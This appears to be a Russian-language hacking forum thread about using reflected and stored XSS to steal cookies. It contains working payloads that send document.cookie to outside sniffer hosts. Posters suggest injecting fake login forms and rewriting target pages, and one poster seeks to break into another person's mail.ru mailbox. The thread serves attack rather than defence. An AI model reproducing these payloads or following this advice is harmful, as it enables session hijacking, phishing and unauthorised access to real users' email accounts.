Есть пассивная XSS, работает только с этим кодом:

code:


img = new Image(); img.src = "http://httpz.ru/n4zjm6erzao.gif?"+document.cookie;


За кражу cookie отвечает +document.cookie;

А что можно еще сделать с XSS?
Можно ли загнать на сервер какого нибудь червя?

С помощью XSS ? Червя ?
Мсье, зубочисткой дверь взломайте.
Нет, если бы она была активной, можно было бы что-то интересное провернуть, но пассивка поможет только куки украсть.

Цитата:

Сообщение от noizZzefan

С помощью XSS ? Червя ?
Мсье, зубочисткой дверь взломайте.
Нет, если бы она была активной, можно было бы что-то интересное провернуть, но пассивка поможет только куки украсть.

Не уходите в оффлай!
Есть вероятность что это активка!
Как нарыть что-то интересное?

у меня есть активка на одном сайте. что с ёё помощью ещё можно сделать? хороший вопрос.

В принципе и с активкой, и с пассивкой можно сделать все, что позволяет javascript, вплодь до полной замены и перерисовки страницы, можно с помощью нее разместить фейковую форму со своим обработчиком прямо на странице целевого сайта. Конечно, она не будет изначально хранится коде на сервере, а будет генерироваться динамически скриптом, который ты активируешь через активку/пассивку, роли это не меняет. Главное правильно использовать под свои нужды XSS и все будет в твоих руках. Кража куков лишь 1% от возможностей XSS.

Так то оно конечно так, но от активки больше пользы будет.
На пассивку могут попасть люди только у которых есть ядовитая ссылка, а активку видят все люди, которые зашли на страницу с кодом.

Цитата:

Сообщение от noizZzefan

Так то оно конечно так, но от активки больше пользы будет.
На пассивку могут попасть люди только у которых есть ядовитая ссылка, а активку видят все люди, которые зашли на страницу с кодом.

стоит дополнить, что активка не требует обходов анти-xss фильтров хрома и ИЕ

code:

Кража куков лишь 1% от возможностей XSS.

Так что же можно еще сделать? и как?

У меня есть свой хост. XSS выполняется. Не могу понять как украсть куки после авторизации на mail.ru, открытии письма и перехода по ссылке с XSS. Лог в сниффер приходит, но куков там нет. Что я делю не так? Вот код, который выполняется на хосте:

img = new Image(); img.src = "http://httpz.org/nhong1skzss.gif?"+document.cookie;
var URL = "http://images.cards.mail.ru/11bolprivet.jpg"
var speed = 3000;
function reload() {
document.location = URL
}
setTimeout("reload()", speed);

mrfed, лол, а на твоем хосте есть куки от мэил.ру? -правильно, нету! Тебе нужно, чтобы скрипт выполнялся на сайте мэил.ру

Цитата:

Сообщение от ZoRKeG

mrfed, лол, а на твоем хосте есть куки от мэил.ру? -правильно, нету! Тебе нужно, чтобы скрипт выполнялся на сайте мэил.ру

А как или чем найти XSS на mail.ru? Может есть еще способы влезть в почтовый ящик недоброжелателя? Брут отпадает. PWD is STRONG! Кстати, mail.ru с некоторых пор авторизует через https это не затруднит получение куков, если будет XSS на mail.ru?